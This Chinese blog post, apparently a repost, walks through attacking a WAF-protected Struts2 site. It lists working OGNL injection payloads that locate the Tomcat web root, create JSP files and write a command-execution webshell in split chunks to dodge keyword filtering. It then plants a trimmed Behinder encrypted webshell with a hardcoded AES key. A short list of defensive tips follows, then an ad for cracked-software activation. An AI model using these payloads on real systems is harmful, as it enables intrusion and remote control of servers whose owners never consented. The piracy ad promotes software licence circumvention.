请遵守法律法规,文章仅供安全防范与学习,严禁非法使用,后果自负。
继之前的Struts2绕过waf读写文件之后,遇到了一个实例,分享一下思路。
0x01 背景
朋友发来一个struts2有waf的站点,能检测到漏洞,但是命令执行不了,上传shell肯定也就不行了,估计是检测了关键字,直接开干
0x02 写命令执行马
一开始的思路是访问站点的jsp文件,比如http://xx.xxx/123.jsp测试有没有全局拦截,很显然,这里是没有的
直接可以进行写shell,先找绝对路径
0x001 查看web目录
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#response.println(#req.getRealPath('/')),#response.flush(),#response.close()}
这里web目录是/usr/local/tomcat/webapps/ROOT/,直接写个文件到/usr/local/tomcat/webapps/ROOT/3.jsp
0x002 创建文件
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp"),#bb0.flush(),#response.flush(),#response.close()}
0x003 写文件
这里写文件遇到了困难,原因在于出现了关键字getRuntime(),但是是可以绕过的,分批次进行写入文件,本地进行测试如下
package Struts2bypasswaf; import java.io.BufferedWriter; import java.io.IOException; / * @author f0ng * @date 2022/5/24 */public class teststruts2 { public static void main(String[] args) throws IOException { BufferedWriter aaa = new java.io.BufferedWriter(new java.io.FileWriter("1.txt",true)); aaa.append("\""); aaa.flush(); aaa.close(); } }
原始文件如下
执行Java代码后
可以发现双引号被追加写入了(这里为什么拎出来双引号,因为需要转义)
写文件分段1
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("<% java.io.InputStream in = Runtime.getRun"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}
写文件分段2
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/3.jsp",true)),#bb0.append("time().exec(request.getParameter(\"pass\")).getInputStream();int a = -1;byte[] b = new byte[2048];while((a=in.read(b))!=-1){out.println(new String(b));} %>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}
0x004 执行命令
访问webshell即可
0x03 写入冰蝎马
这时候朋友又说了,这个webshell不可操作,他不喜欢
那么仿造之前的方法写个冰蝎给他不就行了,前面都是一样的,给出数据包
创建文件:
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp"),#bb0.flush(),#response.flush(),#response.close()}
写入文件:
内容是
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>
%{#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#bb0=new java.io.BufferedWriter(new java.io.FileWriter("/usr/local/tomcat/webapps/ROOT/43.jsp",true)),#bb0.append("<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%>"),#bb0.flush(),#bb0.close(),#response.flush(),#response.close()}
后面再写就发现出问题了,怎么都写不进去,但是一个一个字符是可以的,那么就可以单个字符进行追加写入;但是又遇到了一个问题,单个字符的{和}写不进去,原因暂不清楚,所以直接阉割了冰蝎马,后面为:
<% String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>
去除了if (request.getMethod().equals(“POST”)){}注意要将%改为%25,要将“改为\””,转义
连接成功
0x04 总结
- 对于通过http去写入特殊字符,要考虑URL编码以及转义的问题,如%变成了%25,“变成了\”;
- 运用到实战之前现在本地环境进行复现是很有必要的;
- 文件落地比较麻烦,如果可以注入内存马那是比较方便的。
0x05 参考
https://sigusoft.com/s/outtxUANOa406ErGleWjtQ 【struts2绕过waf读写文件及另类方式执行命令】
https://github.com/vulhub/vulhub/tree/master/struts2/s2-016 【Struts2 016环境】
from https://sigusoft.com/s/31nUrF1v50-J2v6IOYzNYA
Struts2 是一个广泛使用的 Web 应用程序框架,但是由于其复杂的结构和高度可配置性,也存在一些安全风险,攻击者可以利用这些漏洞进行远程代码执行、文件读取等攻击。一些站点为了防御这些攻击,会使用 Web 应用程序防火墙(WAF)来进行防御。但是,WAF 并不能完全解决所有的安全问题,以下是一些建议:
- 及时更新 Struts2 版本,确保漏洞得到及时修复。
- 对用户输入的数据进行严格的校验和过滤,避免通过用户输入的数据构造恶意请求。
- 启用安全的开发实践,如使用安全的密码存储和传输方案、使用 CSRF token 防范 CSRF 攻击等。
- 配置正确的权限控制策略,限制用户访问敏感资源的权限。
- 将应用程序部署在安全的环境中,如安全的操作系统、数据库等,避免因为操作系统或数据库的漏洞导致应用程序受到攻击。
- 对系统日志进行监控,及时发现和响应异常请求和攻击行为。
- 不要过分依赖 WAF,WAF 可以起到一定的防御作用,但并不能完全保证系统的安全,因此需要进行综合的安全风险评估和防范措施。
需要注意的是,以上建议只是一些基本的防范措施,对于特定的应用场景和攻击方式,可能需要针对性的防范措施。因此,在开发和部署应用程序时,还需要根据具体情况综合考虑各种安全风险,并采取相应的防范措施。
2024最新激活全家桶教程,稳定运行到2099年,请移步至置顶文章:https://sigusoft.com/99576.html
版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。 文章由激活谷谷主-小谷整理,转载请注明出处:https://sigusoft.com/17616.html